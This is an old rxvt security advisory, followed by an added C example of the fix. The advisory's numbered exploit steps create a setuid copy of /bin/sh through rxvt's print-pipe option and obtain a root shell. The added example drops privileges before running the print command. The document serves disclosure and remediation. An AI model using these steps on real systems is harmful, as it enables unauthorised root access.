Program: rxvt

Affected Operating Systems: Linux Slackware 3.0, RedHat 2.1, others with rxvt suid root (and compiled with PRINT_PIPE)

Requirements: account on system, X server

Temporary Patch: chmod -s /usr/X11R6/bin/rxvt

Security Compromise: root

Author: Dave M. (davem@cmu.edu)

Synopsis: rxvt fails to give up root privileges before opening a pipe to a program that can be specified by the user.

Exploit:

1. Set DISPLAY environment variable if necessary so you can use x clients.

2. In user shell:

   $ echo 'cp /bin/sh /tmp/rxsh;chmod 4755 /tmp/rxsh' > /tmp/rxbug
   $ chmod +x /tmp/rxbug
   $ rxvt -print-pipe /tmp/rxbug

3. In rxvt xclient:

   $ cat
   ESC[5i
   ESC[4i

   (The client will close at this point with a broken pipe)

4. $ /tmp/rxsh
   # whoami
   root
   #
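
The fix the synopsis implies, as an added example (not rxvt's code and not part of the original advisory): the child process permanently drops its set-uid privileges before it runs the user-chosen print command, and refuses to run it if the drop fails. The names drop_privileges and run_print_pipe are hypothetical, and the sample command and data are constructed.

```c
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Permanently drop set-uid/set-gid privileges; 0 on success, -1 on failure. */
int drop_privileges(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();
    /* Group first: once the uid is dropped we may no longer change gids. */
    if (setgid(rgid) != 0 || setuid(ruid) != 0)
        return -1;
    /* The drop must be irreversible: regaining root has to fail. */
    if (ruid != 0 && (setuid(0) == 0 || seteuid(0) == 0))
        return -1;
    return (geteuid() == ruid && getegid() == rgid) ? 0 : -1;
}

/* Hypothetical helper: feed `data` to the print command `cmd`, which runs
 * as the invoking user. Returns the command's exit status, or -1 on error. */
int run_print_pipe(const char *cmd, const char *data)
{
    int fds[2], status;
    pid_t pid;
    ssize_t n;
    if (pipe(fds) != 0)
        return -1;
    if ((pid = fork()) < 0) {
        close(fds[0]); close(fds[1]);
        return -1;
    }
    if (pid == 0) {                 /* child: becomes the print command */
        if (drop_privileges() != 0 || dup2(fds[0], STDIN_FILENO) < 0)
            _exit(126);             /* fail closed: never exec with root */
        close(fds[0]);
        close(fds[1]);
        execl("/bin/sh", "sh", "-c", cmd, (char *)NULL);
        _exit(127);
    }
    close(fds[0]);                  /* parent keeps only the write end */
    n = write(fds[1], data, strlen(data));
    close(fds[1]);                  /* EOF lets the command finish */
    if (waitpid(pid, &status, 0) < 0 || n < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void) { return run_print_pipe("cat >/dev/null", "constructed page\n"); }
```

Only the child drops privileges here, so a parent that still needs its set-uid rights for other work keeps them while the print command never does.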